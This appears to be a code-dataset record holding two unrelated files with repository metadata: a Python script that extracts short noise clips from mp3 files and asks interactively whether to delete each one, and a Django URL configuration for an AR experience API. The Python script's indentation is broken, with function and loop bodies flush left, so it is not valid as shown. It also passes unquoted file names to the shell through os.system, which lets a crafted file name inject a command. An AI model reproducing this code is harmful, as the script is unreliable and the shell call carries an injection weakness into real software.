annotation/helpers/helpers/extract_noise.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 87 |
2020-08-07T19:12:10.000Z
|
2022-02-08T14:46:34.000Z
|
annotation/helpers/helpers/extract_noise.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 25 |
2020-08-07T20:03:08.000Z
|
2022-03-16T07:33:25.000Z
|
import shutil, os, random
from pydub import AudioSegment
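# Extract short noise clips from the .mp3 files in the current directory into ./noise, then review each clip interactively.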
try:
    os.mkdir('noise')
except FileExistsError:
    # Start from a clean 'noise' directory if one already exists.
    shutil.rmtree('noise')
    os.mkdir('noise')
def extract_noise(filename, length):
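    """Export a noise clip of 'length' milliseconds (starting at 100 ms) from the given mp3 file and move it into ./noise."""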
song = AudioSegment.from_mp3(filename)
first = song[100:100+length]
first.export(filename[0:-4]+'_noise.mp3')
shutil.move(os.getcwd()+'/'+filename[0:-4]+'_noise.mp3', os.getcwd()+'/noise/'+filename[0:-4]+'_noise.mp3')
listdir=os.listdir()
mp3files=list()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
mp3files.append(listdir[i])
random.shuffle(mp3files)
for i in range(len(mp3files)):
extract_noise(mp3files[i],300)
if i == 100:
break
os.chdir('noise')
listdir=os.listdir()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
os.system('play %s'%(listdir[i]))
remove=input('should remove? type y to remove')
if remove=='y':
os.remove(listdir[i])
| 27.548387 | 108 | 0.688525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 133 | 0.155738 |
7b248b5ee36bb65d830c7b56e66b0b390aa45baa
| 1,030 |
py
|
Python
|
ARMODServers/Apps/Apiv2/urls.py
|
Phantomxm2021/ARMOD-Dashboard
|
383cf0a5e72dc5a2651f43e693f06773d5b88bbd
|
[
"Apache-2.0"
] | 1 |
2021-11-04T09:03:27.000Z
|
2021-11-04T09:03:27.000Z
|
ARMODServers/Apps/Apiv2/urls.py
|
Phantomxm2021/ARMOD-Dashboard
|
383cf0a5e72dc5a2651f43e693f06773d5b88bbd
|
[
"Apache-2.0"
] | null | null | null |
ARMODServers/Apps/Apiv2/urls.py
|
Phantomxm2021/ARMOD-Dashboard
|
383cf0a5e72dc5a2651f43e693f06773d5b88bbd
|
[
"Apache-2.0"
] | null | null | null |
from django.conf.urls import url
from Apps.Apiv2.views import GetARResourcesView, GetARExperienceDetailView
from Apps.Apiv2.views import GetTagListView,GetARExperienceRecommendList,GetARExperiencePublicListView,GetARExperiencesView
from Apps.Apiv2.views import GetARexperienceByTagsListView
app_name = 'Apps.Users'
urlpatterns = [
url(r'^getarresources$', GetARResourcesView.as_view(), name='getarresources'),
url(r'^getarexperience$', GetARExperienceDetailView.as_view(), name='getarexperience'),
    url(r'^getarexperiencelist$', GetARExperiencesView.as_view(), name='getarexperiencelist'),
url(r'^gettaglist$', GetTagListView.as_view(), name='getshowcasetags'),
url(r'^getrecommendslist$', GetARExperienceRecommendList.as_view(), name='getshowcaserecommends'),
url(r'^getarexperiencepubliclist$', GetARExperiencePublicListView.as_view(), name='getarexperiencepubliclist'),
url(r'^getarexperiencebytagslist$', GetARexperienceByTagsListView.as_view(), name='getarexperiencebytagslist'),
# api/v2/
]
| 60.588235 | 123 | 0.794175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 325 | 0.315534 |